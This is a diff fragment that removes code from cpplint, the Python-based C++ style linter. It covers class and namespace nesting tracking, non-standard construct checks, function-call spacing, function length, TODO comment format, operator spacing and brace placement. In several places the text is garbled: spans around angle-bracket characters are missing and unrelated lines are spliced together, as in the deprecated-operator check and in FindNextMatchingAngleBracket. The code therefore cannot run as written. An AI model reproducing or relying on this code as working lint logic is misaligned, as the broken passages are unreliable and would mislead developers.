class_decl_match.group(2), - clean_lines, linenum)) - line = class_decl_match.group(5) - - # If we have not yet seen the opening brace for the innermost block, - # run checks here. - if not self.SeenOpenBrace(): - self.stack[-1].CheckBegin(filename, clean_lines, linenum, error) - - # Update access control if we are inside a class/struct - if self.stack and isinstance(self.stack[-1], _ClassInfo): - classinfo = self.stack[-1] - access_match = Match( - r'^(.*)\b(public|private|protected|signals)(\s+(?:slots\s*)?)?' - r':(?:[^:]|$)', - line) - if access_match: - classinfo.access = access_match.group(2) - - # Check that access keywords are indented +1 space. Skip this - # check if the keywords are not preceded by whitespaces. - indent = access_match.group(1) - if (len(indent) != classinfo.class_indent + 1 and - Match(r'^\s*$', indent)): - if classinfo.is_struct: - parent = 'struct ' + classinfo.name - else: - parent = 'class ' + classinfo.name - slots = '' - if access_match.group(3): - slots = access_match.group(3) - error(filename, linenum, 'whitespace/indent', 3, - '%s%s: should be indented +1 space inside %s' % ( - access_match.group(2), slots, parent)) - - # Consume braces or semicolons from what's left of the line - while True: - # Match first brace, semicolon, or closed parenthesis. - matched = Match(r'^[^{;)}]*([{;)}])(.*)$', line) - if not matched: - break - - token = matched.group(1) - if token == '{': - # If namespace or class hasn't seen a opening brace yet, mark - # namespace/class head as complete. Push a new block onto the - # stack otherwise. - if not self.SeenOpenBrace(): - self.stack[-1].seen_open_brace = True - else: - self.stack.append(_BlockInfo(True)) - if _MATCH_ASM.match(line): - self.stack[-1].inline_asm = _BLOCK_ASM - elif token == ';' or token == ')': - # If we haven't seen an opening brace yet, but we already saw - # a semicolon, this is probably a forward declaration. Pop - # the stack for these. - # - # Similarly, if we haven't seen an opening brace yet, but we - # already saw a closing parenthesis, then these are probably - # function arguments with extra "class" or "struct" keywords. - # Also pop these stack for these. - if not self.SeenOpenBrace(): - self.stack.pop() - else: # token == '}' - # Perform end of block checks and pop the stack. - if self.stack: - self.stack[-1].CheckEnd(filename, clean_lines, linenum, error) - self.stack.pop() - line = matched.group(2) - - def InnermostClass(self): - """Get class info on the top of the stack. - - Returns: - A _ClassInfo object if we are inside a class, or None otherwise. - """ - for i in range(len(self.stack), 0, -1): - classinfo = self.stack[i - 1] - if isinstance(classinfo, _ClassInfo): - return classinfo - return None - - def CheckCompletedBlocks(self, filename, error): - """Checks that all classes and namespaces have been completely parsed. - - Call this when all lines in a file have been processed. - Args: - filename: The name of the current file. - error: The function to call with any errors found. - """ - # Note: This test can result in false positives if #ifdef constructs - # get in the way of brace matching. See the testBuildClass test in - # cpplint_unittest.py for an example of this. - for obj in self.stack: - if isinstance(obj, _ClassInfo): - error(filename, obj.starting_linenum, 'build/class', 5, - 'Failed to find complete declaration of class %s' % - obj.name) - elif isinstance(obj, _NamespaceInfo): - error(filename, obj.starting_linenum, 'build/namespaces', 5, - 'Failed to find complete declaration of namespace %s' % - obj.name) - - -def CheckForNonStandardConstructs(filename, clean_lines, linenum, - nesting_state, error): - r"""Logs an error if we see certain non-ANSI constructs ignored by gcc-2. - - Complain about several constructs which gcc-2 accepts, but which are - not standard C++. Warning about these in lint is one way to ease the - transition to new compilers. - - put storage class first (e.g. "static const" instead of "const static"). - - "%lld" instead of %qd" in printf-type functions. - - "%1$d" is non-standard in printf-type functions. - - "\%" is an undefined character escape sequence. - - text after #endif is not allowed. - - invalid inner-style forward declaration. - - >? and ?= and )\?=?\s*(\w+|[+-]?\d+)(\.\d*)?', - line): - error(filename, linenum, 'build/deprecated', 3, - '>? and ))?' - # r'\s*const\s*' + type_name + '\s*&\s*\w+\s*;' - error(filename, linenum, 'runtime/member_string_references', 2, - 'const string& members are dangerous. It is much better to use ' - 'alternatives, such as pointers or simple constants.') - - # Everything else in this function operates on class declarations. - # Return early if the top of the nesting stack is not a class, or if - # the class head is not completed yet. - classinfo = nesting_state.InnermostClass() - if not classinfo or not classinfo.seen_open_brace: - return - - # The class may have been declared with namespace or classname qualifiers. - # The constructor and destructor will not have those qualifiers. - base_classname = classinfo.name.split('::')[-1] - - # Look for single-argument constructors that aren't marked explicit. - # Technically a valid construct, but against style. - args = Match(r'\s+(?:inline\s+)?%s\s*\(([^,()]+)\)' - % re.escape(base_classname), - line) - if (args and - args.group(1) != 'void' and - not Match(r'(const\s+)?%s(\s+const)?\s*(?:<\w+>\s*)?&' - % re.escape(base_classname), args.group(1).strip())): - error(filename, linenum, 'runtime/explicit', 5, - 'Single-argument constructors should be marked explicit.') - - -def CheckSpacingForFunctionCall(filename, line, linenum, error): - """Checks for the correctness of various spacing around function calls. - - Args: - filename: The name of the current file. - line: The text of the line to check. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - - # Since function calls often occur inside if/for/while/switch - # expressions - which have their own, more liberal conventions - we - # first see if we should be looking inside such an expression for a - # function call, to which we can apply more strict standards. - fncall = line # if there's no control flow construct, look at whole line - for pattern in (r'\bif\s*\((.*)\)\s*{', - r'\bfor\s*\((.*)\)\s*{', - r'\bwhile\s*\((.*)\)\s*[{;]', - r'\bswitch\s*\((.*)\)\s*{'): - match = Search(pattern, line) - if match: - fncall = match.group(1) # look inside the parens for function calls - break - - # Except in if/for/while/switch, there should never be space - # immediately inside parens (eg "f( 3, 4 )"). We make an exception - # for nested parens ( (a+b) + c ). Likewise, there should never be - # a space before a ( when it's a function argument. I assume it's a - # function argument when the char before the whitespace is legal in - # a function name (alnum + _) and we're not starting a macro. Also ignore - # pointers and references to arrays and functions coz they're too tricky: - # we use a very simple way to recognize these: - # " (something)(maybe-something)" or - # " (something)(maybe-something," or - # " (something)[something]" - # Note that we assume the contents of [] to be short enough that - # they'll never need to wrap. - if ( # Ignore control structures. - not Search(r'\b(if|for|while|switch|return|new|delete|catch|sizeof)\b', - fncall) and - # Ignore pointers/references to functions. - not Search(r' \([^)]+\)\([^)]*(\)|,$)', fncall) and - # Ignore pointers/references to arrays. - not Search(r' \([^)]+\)\[[^\]]+\]', fncall)): - if Search(r'\w\s*\(\s(?!\s*\\$)', fncall): # a ( used for a fn call - error(filename, linenum, 'whitespace/parens', 4, - 'Extra space after ( in function call') - elif Search(r'\(\s+(?!(\s*\\)|\()', fncall): - error(filename, linenum, 'whitespace/parens', 2, - 'Extra space after (') - if (Search(r'\w\s+\(', fncall) and - not Search(r'#\s*define|typedef', fncall) and - not Search(r'\w\s+\((\w+::)*\*\w+\)\(', fncall)): - error(filename, linenum, 'whitespace/parens', 4, - 'Extra space before ( in function call') - # If the ) is followed only by a newline or a { + newline, assume it's - # part of a control statement (if/while/etc), and don't complain - if Search(r'[^)]\s+\)\s*[^{\s]', fncall): - # If the closing parenthesis is preceded by only whitespaces, - # try to give a more descriptive error message. - if Search(r'^\s+\)', fncall): - error(filename, linenum, 'whitespace/parens', 2, - 'Closing ) should be moved to the previous line') - else: - error(filename, linenum, 'whitespace/parens', 2, - 'Extra space before )') - - -def IsBlankLine(line): - """Returns true if the given line is blank. - - We consider a line to be blank if the line is empty or consists of - only white spaces. - - Args: - line: A line of a string. - - Returns: - True, if the given line is blank. - """ - return not line or line.isspace() - - -def CheckForFunctionLengths(filename, clean_lines, linenum, - function_state, error): - """Reports for long function bodies. - - For an overview why this is done, see: - http://google-styleguide.googlecode.com/svn/trunk/cppguide.xml#Write_Short_Functions - - Uses a simplistic algorithm assuming other style guidelines - (especially spacing) are followed. - Only checks unindented functions, so class members are unchecked. - Trivial bodies are unchecked, so constructors with huge initializer lists - may be missed. - Blank/comment lines are not counted so as to avoid encouraging the removal - of vertical space and comments just to get through a lint check. - NOLINT *on the last line of a function* disables this check. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - function_state: Current function name and lines in body so far. - error: The function to call with any errors found. - """ - lines = clean_lines.lines - line = lines[linenum] - raw = clean_lines.raw_lines - raw_line = raw[linenum] - joined_line = '' - - starting_func = False - regexp = r'(\w(\w|::|\*|\&|\s)*)\(' # decls * & space::name( ... - match_result = Match(regexp, line) - if match_result: - # If the name is all caps and underscores, figure it's a macro and - # ignore it, unless it's TEST or TEST_F. - function_name = match_result.group(1).split()[-1] - if function_name == 'TEST' or function_name == 'TEST_F' or ( - not Match(r'[A-Z_]+$', function_name)): - starting_func = True - - if starting_func: - body_found = False - for start_linenum in xrange(linenum, clean_lines.NumLines()): - start_line = lines[start_linenum] - joined_line += ' ' + start_line.lstrip() - if Search(r'(;|})', start_line): # Declarations and trivial functions - body_found = True - break # ... ignore - elif Search(r'{', start_line): - body_found = True - function = Search(r'((\w|:)*)\(', line).group(1) - if Match(r'TEST', function): # Handle TEST... macros - parameter_regexp = Search(r'(\(.*\))', joined_line) - if parameter_regexp: # Ignore bad syntax - function += parameter_regexp.group(1) - else: - function += '()' - function_state.Begin(function) - break - if not body_found: - # No body for the function (or evidence of a non-function) was found. - error(filename, linenum, 'readability/fn_size', 5, - 'Lint failed to find start of function body.') - elif Match(r'^\}\s*$', line): # function end - function_state.Check(error, filename, linenum) - function_state.End() - elif not Match(r'^\s*$', line): - function_state.Count() # Count non-blank/non-comment lines. - - -_RE_PATTERN_TODO = re.compile(r'^//(\s*)TODO(\(.+?\))?:?(\s|$)?') - - -def CheckComment(comment, filename, linenum, error): - """Checks for common mistakes in TODO comments. - - Args: - comment: The text of the comment from the line in question. - filename: The name of the current file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - match = _RE_PATTERN_TODO.match(comment) - if match: - # One whitespace is correct; zero whitespace is handled elsewhere. - leading_whitespace = match.group(1) - if len(leading_whitespace) > 1: - error(filename, linenum, 'whitespace/todo', 2, - 'Too many spaces before TODO') - - username = match.group(2) - if not username: - error(filename, linenum, 'readability/todo', 2, - 'Missing username in TODO; it should look like ' - '"// TODO(my_username): Stuff."') - - middle_whitespace = match.group(3) - # Comparisons made explicit for correctness -- pylint: disable=g-explicit-bool-comparison - if middle_whitespace != ' ' and middle_whitespace != '': - error(filename, linenum, 'whitespace/todo', 2, - 'TODO(my_username) should be followed by a space') - -def CheckAccess(filename, clean_lines, linenum, nesting_state, error): - """Checks for improper use of DISALLOW* macros. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - nesting_state: A _NestingState instance which maintains information about - the current stack of nested blocks being parsed. - error: The function to call with any errors found. - """ - line = clean_lines.elided[linenum] # get rid of comments and strings - - matched = Match((r'\s*(DISALLOW_COPY_AND_ASSIGN|' - r'DISALLOW_EVIL_CONSTRUCTORS|' - r'DISALLOW_IMPLICIT_CONSTRUCTORS)'), line) - if not matched: - return - if nesting_state.stack and isinstance(nesting_state.stack[-1], _ClassInfo): - if nesting_state.stack[-1].access != 'private': - error(filename, linenum, 'readability/constructors', 3, - '%s must be in the private: section' % matched.group(1)) - - else: - # Found DISALLOW* macro outside a class declaration, or perhaps it - # was used inside a function when it should have been part of the - # class declaration. We could issue a warning here, but it - # probably resulted in a compiler error already. - pass - - -def FindNextMatchingAngleBracket(clean_lines, linenum, init_suffix): - """Find the corresponding > to close a template. - - Args: - clean_lines: A CleansedLines instance containing the file. - linenum: Current line number. - init_suffix: Remainder of the current line after the initial <. - - Returns: - True if a matching bracket exists. - """ - line = init_suffix - nesting_stack = ['<'] - while True: - # Find the next operator that can tell us whether < is used as an - # opening bracket or as a less-than operator. We only want to - # warn on the latter case. - # - # We could also check all other operators and terminate the search - # early, e.g. if we got something like this "a(),;\[\]]*([<>(),;\[\]])(.*)$', line) - if match: - # Found an operator, update nesting stack - operator = match.group(1) - line = match.group(2) - - if nesting_stack[-1] == '<': - # Expecting closing angle bracket - if operator in ('<', '(', '['): - nesting_stack.append(operator) - elif operator == '>': - nesting_stack.pop() - if not nesting_stack: - # Found matching angle bracket - return True - elif operator == ',': - # Got a comma after a bracket, this is most likely a template - # argument. We have not seen a closing angle bracket yet, but - # it's probably a few lines later if we look for it, so just - # return early here. - return True - else: - # Got some other operator. - return False - - else: - # Expecting closing parenthesis or closing bracket - if operator in ('<', '(', '['): - nesting_stack.append(operator) - elif operator in (')', ']'): - # We don't bother checking for matching () or []. If we got - # something like (] or [), it would have been a syntax error. - nesting_stack.pop() - - else: - # Scan the next line - linenum += 1 - if linenum >= len(clean_lines.elided): - break - line = clean_lines.elided[linenum] - - # Exhausted all remaining lines and still no matching angle bracket. - # Most likely the input was incomplete, otherwise we should have - # seen a semicolon and returned early. - return True - - -def FindPreviousMatchingAngleBracket(clean_lines, linenum, init_prefix): - """Find the corresponding < that started a template. - - Args: - clean_lines: A CleansedLines instance containing the file. - linenum: Current line number. - init_prefix: Part of the current line before the initial >. - - Returns: - True if a matching bracket exists. - """ - line = init_prefix - nesting_stack = ['>'] - while True: - # Find the previous operator - match = Search(r'^(.*)([<>(),;\[\]])[^<>(),;\[\]]*$', line) - if match: - # Found an operator, update nesting stack - operator = match.group(2) - line = match.group(1) - - if nesting_stack[-1] == '>': - # Expecting opening angle bracket - if operator in ('>', ')', ']'): - nesting_stack.append(operator) - elif operator == '<': - nesting_stack.pop() - if not nesting_stack: - # Found matching angle bracket - return True - elif operator == ',': - # Got a comma before a bracket, this is most likely a - # template argument. The opening angle bracket is probably - # there if we look for it, so just return early here. - return True - else: - # Got some other operator. - return False - - else: - # Expecting opening parenthesis or opening bracket - if operator in ('>', ')', ']'): - nesting_stack.append(operator) - elif operator in ('(', '['): - nesting_stack.pop() - - else: - # Scan the previous line - linenum -= 1 - if linenum < 0: - break - line = clean_lines.elided[linenum] - - # Exhausted all earlier lines and still no matching angle bracket. - return False - - -def CheckSpacing(filename, clean_lines, linenum, nesting_state, error): - """Checks for the correctness of various spacing issues in the code. - - Things we check for: spaces around operators, spaces after - if/for/while/switch, no spaces around parens in function calls, two - spaces between code and comment, don't start a block with a blank - line, don't end a function with a blank line, don't add a blank line - after public/protected/private, don't have too many blank lines in a row. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - nesting_state: A _NestingState instance which maintains information about - the current stack of nested blocks being parsed. - error: The function to call with any errors found. - """ - - # Don't use "elided" lines here, otherwise we can't check commented lines. - # Don't want to use "raw" either, because we don't want to check inside C++11 - # raw strings, - raw = clean_lines.lines_without_raw_strings - line = raw[linenum] - - # Before nixing comments, check if the line is blank for no good - # reason. This includes the first line after a block is opened, and - # blank lines at the end of a function (ie, right before a line like '}' - # - # Skip all the blank line checks if we are immediately inside a - # namespace body. In other words, don't issue blank line warnings - # for this block: - # namespace { - # - # } - # - # A warning about missing end of namespace comments will be issued instead. - if IsBlankLine(line) and not nesting_state.InNamespaceBody(): - elided = clean_lines.elided - prev_line = elided[linenum - 1] - prevbrace = prev_line.rfind('{') - # TODO(unknown): Don't complain if line before blank line, and line after, - # both start with alnums and are indented the same amount. - # This ignores whitespace at the start of a namespace block - # because those are not usually indented. - if prevbrace != -1 and prev_line[prevbrace:].find('}') == -1: - # OK, we have a blank line at the start of a code block. Before we - # complain, we check if it is an exception to the rule: The previous - # non-empty line has the parameters of a function header that are indented - # 4 spaces (because they did not fit in a 80 column line when placed on - # the same line as the function name). We also check for the case where - # the previous line is indented 6 spaces, which may happen when the - # initializers of a constructor do not fit into a 80 column line. - exception = False - if Match(r' {6}\w', prev_line): # Initializer list? - # We are looking for the opening column of initializer list, which - # should be indented 4 spaces to cause 6 space indentation afterwards. - search_position = linenum-2 - while (search_position >= 0 - and Match(r' {6}\w', elided[search_position])): - search_position -= 1 - exception = (search_position >= 0 - and elided[search_position][:5] == ' :') - else: - # Search for the function arguments or an initializer list. We use a - # simple heuristic here: If the line is indented 4 spaces; and we have a - # closing paren, without the opening paren, followed by an opening brace - # or colon (for initializer lists) we assume that it is the last line of - # a function header. If we have a colon indented 4 spaces, it is an - # initializer list. - exception = (Match(r' {4}\w[^\(]*\)\s*(const\s*)?(\{\s*$|:)', - prev_line) - or Match(r' {4}:', prev_line)) - - if not exception: - error(filename, linenum, 'whitespace/blank_line', 2, - 'Redundant blank line at the start of a code block ' - 'should be deleted.') - # Ignore blank lines at the end of a block in a long if-else - # chain, like this: - # if (condition1) { - # // Something followed by a blank line - # - # } else if (condition2) { - # // Something else - # } - if linenum + 1 < clean_lines.NumLines(): - next_line = raw[linenum + 1] - if (next_line - and Match(r'\s*}', next_line) - and next_line.find('} else ') == -1): - error(filename, linenum, 'whitespace/blank_line', 3, - 'Redundant blank line at the end of a code block ' - 'should be deleted.') - - matched = Match(r'\s*(public|protected|private):', prev_line) - if matched: - error(filename, linenum, 'whitespace/blank_line', 3, - 'Do not leave a blank line after "%s:"' % matched.group(1)) - - # Next, we complain if there's a comment too near the text - commentpos = line.find('//') - if commentpos != -1: - # Check if the // may be in quotes. If so, ignore it - # Comparisons made explicit for clarity -- pylint: disable=g-explicit-bool-comparison - if (line.count('"', 0, commentpos) - - line.count('\\"', 0, commentpos)) % 2 == 0: # not in quotes - # Allow one space for new scopes, two spaces otherwise: - if (not Match(r'^\s*{ //', line) and - ((commentpos >= 1 and - line[commentpos-1] not in string.whitespace) or - (commentpos >= 2 and - line[commentpos-2] not in string.whitespace))): - error(filename, linenum, 'whitespace/comments', 2, - 'At least two spaces is best between code and comments') - # There should always be a space between the // and the comment - commentend = commentpos + 2 - if commentend < len(line) and not line[commentend] == ' ': - # but some lines are exceptions -- e.g. if they're big - # comment delimiters like: - # //---------------------------------------------------------- - # or are an empty C++ style Doxygen comment, like: - # /// - # or C++ style Doxygen comments placed after the variable: - # ///< Header comment - # //!< Header comment - # or they begin with multiple slashes followed by a space: - # //////// Header comment - match = (Search(r'[=/-]{4,}\s*$', line[commentend:]) or - Search(r'^/$', line[commentend:]) or - Search(r'^!< ', line[commentend:]) or - Search(r'^/< ', line[commentend:]) or - Search(r'^/+ ', line[commentend:])) - if not match: - error(filename, linenum, 'whitespace/comments', 4, - 'Should have a space between // and comment') - CheckComment(line[commentpos:], filename, linenum, error) - - line = clean_lines.elided[linenum] # get rid of comments and strings - - # Don't try to do spacing checks for operator methods - line = re.sub(r'operator(==|!=|<|<<|<=|>=|>>|>)\(', 'operator\(', line) - - # We allow no-spaces around = within an if: "if ( (a=Foo()) == 0 )". - # Otherwise not. Note we only check for non-spaces on *both* sides; - # sometimes people put non-spaces on one side when aligning ='s among - # many lines (not that this is behavior that I approve of...) - if Search(r'[\w.]=[\w.]', line) and not Search(r'\b(if|while) ', line): - error(filename, linenum, 'whitespace/operators', 4, - 'Missing spaces around =') - - # It's ok not to have spaces around binary operators like + - * /, but if - # there's too little whitespace, we get concerned. It's hard to tell, - # though, so we punt on this one for now. TODO. - - # You should always have whitespace around binary operators. - # - # Check <= and >= first to avoid false positives with < and >, then - # check non-include lines for spacing around < and >. - match = Search(r'[^<>=!\s](==|!=|<=|>=)[^<>=!\s]', line) - if match: - error(filename, linenum, 'whitespace/operators', 3, - 'Missing spaces around %s' % match.group(1)) - # We allow no-spaces around << when used like this: 10<<20, but - # not otherwise (particularly, not when used as streams) - # Also ignore using ns::operator<<; - match = Search(r'(operator|\S)(?:L|UL|ULL|l|ul|ull)?<<(\S)', line) - if (match and - not (match.group(1).isdigit() and match.group(2).isdigit()) and - not (match.group(1) == 'operator' and match.group(2) == ';')): - error(filename, linenum, 'whitespace/operators', 3, - 'Missing spaces around <<') - elif not Match(r'#.*include', line): - # Avoid false positives on -> - reduced_line = line.replace('->', '') - - # Look for < that is not surrounded by spaces. This is only - # triggered if both sides are missing spaces, even though - # technically should flag if at least one side is missing a - # space. This is done to avoid some false positives with shifts. - match = Search(r'[^\s<]<([^\s=<].*)', reduced_line) - if (match and - not FindNextMatchingAngleBracket(clean_lines, linenum, match.group(1))): - error(filename, linenum, 'whitespace/operators', 3, - 'Missing spaces around <') - - # Look for > that is not surrounded by spaces. Similar to the - # above, we only trigger if both sides are missing spaces to avoid - # false positives with shifts. - match = Search(r'^(.*[^\s>])>[^\s=>]', reduced_line) - if (match and - not FindPreviousMatchingAngleBracket(clean_lines, linenum, - match.group(1))): - error(filename, linenum, 'whitespace/operators', 3, - 'Missing spaces around >') - - # We allow no-spaces around >> for almost anything. This is because - # C++11 allows ">>" to close nested templates, which accounts for - # most cases when ">>" is not followed by a space. - # - # We still warn on ">>" followed by alpha character, because that is - # likely due to ">>" being used for right shifts, e.g.: - # value >> alpha - # - # When ">>" is used to close templates, the alphanumeric letter that - # follows would be part of an identifier, and there should still be - # a space separating the template type and the identifier. - # type> alpha - match = Search(r'>>[a-zA-Z_]', line) - if match: - error(filename, linenum, 'whitespace/operators', 3, - 'Missing spaces around >>') - - # There shouldn't be space around unary operators - match = Search(r'(!\s|~\s|[\s]--[\s;]|[\s]\+\+[\s;])', line) - if match: - error(filename, linenum, 'whitespace/operators', 4, - 'Extra space for operator %s' % match.group(1)) - - # A pet peeve of mine: no spaces after an if, while, switch, or for - match = Search(r' (if\(|for\(|while\(|switch\()', line) - if match: - error(filename, linenum, 'whitespace/parens', 5, - 'Missing space before ( in %s' % match.group(1)) - - # For if/for/while/switch, the left and right parens should be - # consistent about how many spaces are inside the parens, and - # there should either be zero or one spaces inside the parens. - # We don't want: "if ( foo)" or "if ( foo )". - # Exception: "for ( ; foo; bar)" and "for (foo; bar; )" are allowed. - match = Search(r'\b(if|for|while|switch)\s*' - r'\(([ ]*)(.).*[^ ]+([ ]*)\)\s*{\s*$', - line) - if match: - if len(match.group(2)) != len(match.group(4)): - if not (match.group(3) == ';' and - len(match.group(2)) == 1 + len(match.group(4)) or - not match.group(2) and Search(r'\bfor\s*\(.*; \)', line)): - error(filename, linenum, 'whitespace/parens', 5, - 'Mismatching spaces inside () in %s' % match.group(1)) - if len(match.group(2)) not in [0, 1]: - error(filename, linenum, 'whitespace/parens', 5, - 'Should have zero or one spaces inside ( and ) in %s' % - match.group(1)) - - # You should always have a space after a comma (either as fn arg or operator) - # - # This does not apply when the non-space character following the - # comma is another comma, since the only time when that happens is - # for empty macro arguments. - # - # We run this check in two passes: first pass on elided lines to - # verify that lines contain missing whitespaces, second pass on raw - # lines to confirm that those missing whitespaces are not due to - # elided comments. - if Search(r',[^,\s]', line) and Search(r',[^,\s]', raw[linenum]): - error(filename, linenum, 'whitespace/comma', 3, - 'Missing space after ,') - - # You should always have a space after a semicolon - # except for few corner cases - # TODO(unknown): clarify if 'if (1) { return 1;}' is requires one more - # space after ; - if Search(r';[^\s};\\)/]', line): - error(filename, linenum, 'whitespace/semicolon', 3, - 'Missing space after ;') - - # Next we will look for issues with function calls. - CheckSpacingForFunctionCall(filename, line, linenum, error) - - # Except after an opening paren, or after another opening brace (in case of - # an initializer list, for instance), you should have spaces before your - # braces. And since you should never have braces at the beginning of a line, - # this is an easy test. - match = Match(r'^(.*[^ ({]){', line) - if match: - # Try a bit harder to check for brace initialization. This - # happens in one of the following forms: - # Constructor() : initializer_list_{} { ... } - # Constructor{}.MemberFunction() - # Type variable{}; - # FunctionCall(type{}, ...); - # LastArgument(..., type{}); - # LOG(INFO) << type{} << " ..."; - # map_of_type[{...}] = ...; - # - # We check for the character following the closing brace, and - # silence the warning if it's one of those listed above, i.e. - # "{.;,)<]". - # - # To account for nested initializer list, we allow any number of - # closing braces up to "{;,)<". We can't simply silence the - # warning on first sight of closing brace, because that would - # cause false negatives for things that are not initializer lists. - # Silence this: But not this: - # Outer{ if (...) { - # Inner{...} if (...){ // Missing space before { - # }; } - # - # There is a false negative with this approach if people inserted - # spurious semicolons, e.g. "if (cond){};", but we will catch the - # spurious semicolon with a separate check. - (endline, endlinenum, endpos) = CloseExpression( - clean_lines, linenum, len(match.group(1))) - trailing_text = '' - if endpos > -1: - trailing_text = endline[endpos:] - for offset in xrange(endlinenum + 1, - min(endlinenum + 3, clean_lines.NumLines() - 1)): - trailing_text += clean_lines.elided[offset] - if not Match(r'^[\s}]*[{.;,)<\]]', trailing_text): - error(filename, linenum, 'whitespace/braces', 5, - 'Missing space before {') - - # Make sure '} else {' has spaces. - if Search(r'}else', line): - error(filename, linenum, 'whitespace/braces', 5, - 'Missing space before else') - - # You shouldn't have spaces before your brackets, except maybe after - # 'delete []' or 'new char * []'. - if Search(r'\w\s+\[', line) and not Search(r'delete\s+\[', line): - error(filename, linenum, 'whitespace/braces', 5, - 'Extra space before [') - - # You shouldn't have a space before a semicolon at the end of the line. - # There's a special case for "for" since the style guide allows space before - # the semicolon there. - if Search(r':\s*;\s*$', line): - error(filename, linenum, 'whitespace/semicolon', 5, - 'Semicolon defining empty statement. Use {} instead.') - elif Search(r'^\s*;\s*$', line): - error(filename, linenum, 'whitespace/semicolon', 5, - 'Line contains only semicolon. If this should be an empty statement, ' - 'use {} instead.') - elif (Search(r'\s+;\s*$', line) and - not Search(r'\bfor\b', line)): - error(filename, linenum, 'whitespace/semicolon', 5, - 'Extra space before last semicolon. If this should be an empty ' - 'statement, use {} instead.') - - # In range-based for, we wanted spaces before and after the colon, but - # not around "::" tokens that might appear. - if (Search('for *\(.*[^:]:[^: ]', line) or - Search('for *\(.*[^: ]:[^:]', line)): - error(filename, linenum, 'whitespace/forcolon', 2, - 'Missing space around colon in range-based for loop') - - -def CheckSectionSpacing(filename, clean_lines, class_info, linenum, error): - """Checks for additional blank line issues related to sections. - - Currently the only thing checked here is blank line before protected/private. - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - class_info: A _ClassInfo objects. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - # Skip checks if the class is small, where small means 25 lines or less. - # 25 lines seems like a good cutoff since that's the usual height of - # terminals, and any class that can't fit in one screen can't really - # be considered "small". - # - # Also skip checks if we are on the first line. This accounts for - # classes that look like - # class Foo { public: ... }; - # - # If we didn't find the end of the class, last_line would be zero, - # and the check will be skipped by the first condition. - if (class_info.last_line - class_info.starting_linenum <= 24 or - linenum <= class_info.starting_linenum): - return - - matched = Match(r'\s*(public|protected|private):', clean_lines.lines[linenum]) - if matched: - # Issue warning if the line before public/protected/private was - # not a blank line, but don't do this if the previous line contains - # "class" or "struct". This can happen two ways: - # - We are at the beginning of the class. - # - We are forward-declaring an inner class that is semantically - # private, but needed to be public for implementation reasons. - # Also ignores cases where the previous line ends with a backslash as can be - # common when defining classes in C macros. - prev_line = clean_lines.lines[linenum - 1] - if (not IsBlankLine(prev_line) and - not Search(r'\b(class|struct)\b', prev_line) and - not Search(r'\\$', prev_line)): - # Try a bit harder to find the beginning of the class. This is to - # account for multi-line base-specifier lists, e.g.: - # class Derived - # : public Base { - end_class_head = class_info.starting_linenum - for i in range(class_info.starting_linenum, linenum): - if Search(r'\{\s*$', clean_lines.lines[i]): - end_class_head = i - break - if end_class_head < linenum - 1: - error(filename, linenum, 'whitespace/blank_line', 3, - '"%s:" should be preceded by a blank line' % matched.group(1)) - - -def GetPreviousNonBlankLine(clean_lines, linenum): - """Return the most recent non-blank line and its line number. - - Args: - clean_lines: A CleansedLines instance containing the file contents. - linenum: The number of the line to check. - - Returns: - A tuple with two elements. The first element is the contents of the last - non-blank line before the current line, or the empty string if this is the - first non-blank line. The second is the line number of that line, or -1 - if this is the first non-blank line. - """ - - prevlinenum = linenum - 1 - while prevlinenum >= 0: - prevline = clean_lines.elided[prevlinenum] - if not IsBlankLine(prevline): # if not a blank line... - return (prevline, prevlinenum) - prevlinenum -= 1 - return ('', -1) - - -def CheckBraces(filename, clean_lines, linenum, error): - """Looks for misplaced braces (e.g. at the end of line). - - Args: - filename: The name of the current file. - clean_lines: A CleansedLines instance containing the file. - linenum: The number of the line to check. - error: The function to call with any errors found. - """ - - line = clean_lines.elided[linenum] # get rid of comments and strings - - if Match(r'\s*{\s*$', line): - # We allow an open brace to start a line in the case where someone is using - # braces in a block to explicitly create a new scope, which is commonly used - # to control the lifetime of stack-allocated variables. Braces are also - # used for brace initializers inside function calls. We don't detect this - # perfectly: we just don't complain if the last non-whitespace character on - # the previous non-blank line is ',', ';', ':', '(', '{', or '}', or if the - # previous line starts a preprocessor block. - prevline = GetPreviousNonBlankLine(clean_lines, linenum)[0] - if (not Search(r'[,;:}{(]\s*$', prevline) and - not Match(r'\s*#', prevline)): - error(filename, linenum, 'whitespace/braces', 4, - '{ should almost always be at the end of the previous line') - - # An else clause should be on the same line as the preceding closing brace. - if Match(r'\s*else\s*', line): - prevline = GetPreviousNonBlankLine(clean_lines, linenum)[0] - if Match(r'\s*}\s*$', prevline): - error(filename, linenum, 'whitespace/newline', 4, - 'An else should appear on the same line as the preceding }') - - # If braces come on one side of an else, they should be on both. - # However, we have to worry about "else if" that spans multiple lines! - if Search(r'}\s*else[^{]*$', line) or Match(r'[^}]*else\s*{', line): - if Search(r'}\s*else if([^{]*)$', line): # could be multi-line if - # find the ( after the if - pos = line.find('else if') - pos = line.find('(', pos) - if pos > 0: - (endline, _, endpos) = CloseExpression(clean_lines, linenum, pos) - if endline[endpos:].find('{') == -1: # must be brace after if - error(filename, linenum, 'readability/braces', 5, - 'If an else has a brace on one side, it should have it on both') - else: # common case: else not followed by a multi-line if - error(filename, linenum, 'readability/braces', 5, - 'If an else has a brace on one side, it should have it on both') - - # Likewise, an else should never have the else clause on the same line - if Search(r'\belse [^\s{]', line) and not Search(r'\belse if\b', line): - error(filename, linenum, 'whitespace/newline', 4, - 'Else clause should never be on same line as else (use 2 lines)') - - # In the same way, a do/while should never be on one line - if Match(r'\s*do [^\s{]', line): - error(filename, linenum, 'whitespace/newline', 4, - 'do/while clauses should not be on a single line') - - # Block bodies should not be followed by a semicolon. Due to C++11 - # brace initialization, there are more places where semicolons are - # required than not, so we use a whitelist approach to check these - # rather than a blacklist. These are the places where "};" should - # be replaced by just "}": - # 1. Some flavor of block following closing parenthesis: - # for (;;) {}; - # while (...) {}; - # switch (...) {}; - # Function(...) {}; - # if (...) {}; - # if (...) else if (...) {}; - # - # 2. else block: - # if (...) else {}; - # - # 3. const member function: - # Function(...) const {}; - # - # 4. Block following some statement: - # x = 42; - # {}; - # - # 5. Block at the 